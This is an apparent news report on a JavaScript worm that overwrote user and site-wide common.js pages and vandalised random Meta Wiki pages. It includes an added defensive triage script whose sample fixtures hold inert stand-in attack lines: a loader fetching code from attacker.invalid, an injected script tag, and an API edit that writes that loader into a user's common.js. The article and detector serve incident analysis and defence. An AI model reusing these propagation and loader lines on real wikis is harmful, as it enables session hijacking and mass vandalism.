The Wikimedia Foundation experienced a security incident after a self-propagating JavaScript worm modified user scripts and vandalized pages on Meta Wiki.
The issue was quickly detected by editors who noticed unusual automated edits across the platform.
Users first raised alarms on Wikipedia’s Village Pump technical forum after spotting large numbers of edits that inserted hidden scripts and vandalized random pages. In response, Wikimedia engineers temporarily restricted editing across multiple projects while they investigated the problem and began reverting the malicious changes.
The incident appears to have started when a malicious JavaScript file hosted on Russian Wikipedia was executed. The script, stored at a page called User:Ololoshka562/test.js, had originally been uploaded in March 2024 and was reportedly linked to scripts used in previous attacks on wiki projects.
Based on edit history analysis, the script was triggered earlier in the day by a Wikimedia employee account during testing of user script functionality. It is not yet clear whether the script was intentionally executed, accidentally loaded during testing, or activated through a compromised account.
Once executed, the script attempted to spread by injecting malicious code into both user-specific JavaScript pages and the site-wide MediaWiki interface script. MediaWiki lets editors customize the interface with JavaScript stored in wiki pages such as MediaWiki:Common.js (loaded for everyone) and each user's own common.js subpage under their user page (loaded only for that logged-in user); the wiki serves these pages to the browser, where they run with the same privileges as the logged-in session.

The worm attempted two forms of persistence. First, it tried to overwrite the infected user's personal common.js page with a loader that would automatically fetch and run the malicious script whenever that user visited the wiki while logged in. Second, if the infected account held the permissions needed to edit the site-wide interface (on Wikimedia wikis, the interface-administrator right), it attempted to modify MediaWiki:Common.js so that the loader would execute for everyone who loaded the site-wide script, not just the one account.
If the global script was successfully modified, anyone loading the page would unknowingly execute the malicious loader, which would then repeat the same process and attempt to spread further.
The worm also vandalized content by automatically selecting random pages using the Special:Random feature and editing them to insert an image along with hidden JavaScript code that loaded additional scripts from an external website.
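The two persistence paths and the Special:Random vandalism described above leave recognizable traces in the text of the edited pages: a loader pointing at a host outside the wiki, an API edit call whose target is a common.js page, dynamically created script tags, and raw script markup dropped into article wikitext. The following is an added example, not Wikimedia Foundation code and not the worm itself, of a static triage pass a responder could run over exported revisions of user scripts and content pages. The trusted-host suffix list is an assumption, and every entry in SAMPLE_REVISIONS is constructed for illustration (the `attacker.invalid` host and the `Example…` user names are placeholders); none is taken from the incident.

```javascript
// Added example (not Wikimedia Foundation code): offline triage of MediaWiki
// user-script and page revisions for the loader, propagation and vandalism
// patterns described in the article. Trusted hosts are an assumption and all
// sample revisions are constructed fixtures, not material from the incident.

// Hosts from which a first-party script load is expected (assumption).
const TRUSTED_SUFFIXES = ["wikipedia.org", "wikimedia.org", "mediawiki.org", "wiktionary.org"];

function hostIsTrusted(host) {
  const h = host.toLowerCase();
  return TRUSTED_SUFFIXES.some((s) => h === s || h.endsWith("." + s));
}

// Every http(s) URL in a script or wikitext body. Protocol-relative URLs
// ("//host/path") are included because MediaWiki scripts commonly use them.
function extractUrls(src) {
  const re = /(?:https?:)?\/\/[a-z0-9.-]+\.[a-z]{2,}(?::\d+)?(?:\/[^\s'"`<>)]*)?/gi;
  return (src.match(re) || []).map((u) => (u.startsWith("//") ? "https:" + u : u));
}

// Hostnames referenced by the body that are not on the trusted list.
function externalHosts(src) {
  const hosts = new Set();
  for (const u of extractUrls(src)) {
    let host;
    try {
      host = new URL(u).hostname;
    } catch {
      continue; // not a parseable URL; ignore
    }
    if (!hostIsTrusted(host)) hosts.add(host);
  }
  return [...hosts];
}

// Static indicators keyed to the behaviour described in the article.
// Each is a hint, not proof; legitimate gadgets trip some of them.
const INDICATORS = [
  ["url-loader", /(?:\bmw\.loader\.load|\bimportScriptURI|\$\.getScript)\s*\(\s*['"`](?:https?:)?\/\//],
  ["dynamic-script-tag", /createElement\s*\(\s*['"]script['"]\s*\)/],
  ["dynamic-eval", /\b(?:eval|Function)\s*\(/],
  ["touches-common-js", /common\.js/i],
  ["api-edit-call", /action\s*:\s*['"]edit['"]|postWithEditToken|postWithToken\s*\(\s*['"]csrf['"]/],
  ["random-page-walk", /Special:Random/],
  ["raw-script-tag", /<script\b/i], // never executes in wikitext, but marks vandalism
];

// Indicators common in benign scripts; they only matter in combination.
const WEAK = new Set(["url-loader", "touches-common-js"]);

function triage(title, src) {
  const findings = INDICATORS.filter(([, re]) => re.test(src)).map(([name]) => name);
  const hosts = externalHosts(src);
  if (hosts.length > 0) findings.push("untrusted-host");
  // Self-propagation needs both an edit capability and a script page as target.
  const propagates = findings.includes("api-edit-call") && findings.includes("touches-common-js");
  if (propagates) findings.push("self-propagation");
  const strong = findings.filter((f) => !WEAK.has(f));
  const severity = propagates ? "critical" : hosts.length > 0 ? "high" : strong.length > 0 ? "review" : "clean";
  return { title, findings, hosts, propagates, severity };
}

function triageAll(revisions) {
  return revisions.map((r) => triage(r.title, r.src));
}

// Constructed fixtures. The "propagation stage" is inert text that mirrors the
// behaviour the article describes; nothing in it is executed by this script.
const SAMPLE_REVISIONS = [
  { title: "User:ExampleBenign/common.js", src: [
    "// Loads a gadget from the same wiki (constructed benign example)",
    "mw.loader.load('https://en.wikipedia.org/w/index.php?title=User:ExampleBenign/tools.js&action=raw&ctype=text/javascript');",
    "importScript('User:ExampleBenign/helper.js');",
  ].join("\n") },
  { title: "User:ExampleVictim/common.js", src: [
    "// Constructed stand-in for a malicious loader; no real payload exists at this host.",
    "mw.loader.load('https://attacker.invalid/stage2.js');",
  ].join("\n") },
  { title: "MediaWiki:Common.js", src: [
    "/* constructed stand-in for a propagation stage; inert text, nothing here runs */",
    "var s = document.createElement('script'); s.src = '//attacker.invalid/stage2.js'; document.head.appendChild(s);",
    'var loader = "mw.loader.load(" + JSON.stringify(s.src) + ")";',
    "new mw.Api().postWithEditToken({ action: 'edit', title: 'User:' + mw.config.get('wgUserName') + '/common.js', text: loader });",
    "location.href = mw.util.getUrl('Special:Random');",
  ].join("\n") },
  { title: "Example article (wikitext)", src:
    '[[File:Example.jpg|thumb]]<div style="display:none"><script src="https://attacker.invalid/v.js"></script></div>' },
];

for (const r of triageAll(SAMPLE_REVISIONS)) {
  console.log(`${r.severity.padEnd(8)} ${r.title}  [${r.findings.join(", ")}]`);
}
```

The severity ladder is deliberately conservative: a loader that fetches from a trusted wiki host is reported as clean, an external host alone is high, and only the combination of an edit call with a common.js target is treated as self-propagation. In a real response the input would be the raw `action=raw` content of every `.js` page edited in the incident window, plus the wikitext of every page touched by the implicated accounts.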

Analysis of the edit history indicates that 3,996 pages were modified during the incident and that roughly 85 user common.js pages were overwritten by the worm. The exact number of deleted pages remains unknown.
As the attack spread, Wikimedia engineers restricted editing across projects and began removing the malicious scripts. Staff rolled back the affected user scripts and suppressed the modified revisions from public page histories.
According to a statement from the Wikimedia Foundation, the malicious code was active for only about 23 minutes. During that time, it altered and deleted content on Meta Wiki, but the affected pages have since been restored.
The foundation said the incident occurred while staff were conducting a security review of user-authored code on Wikipedia and accidentally activated dormant malicious code. The organization emphasized that there is no evidence of an external attack or any breach of personal data.
Editing across Wikimedia projects has since been restored, and the malicious code has been removed. The foundation said it is working on additional security measures to reduce the risk of similar incidents in the future.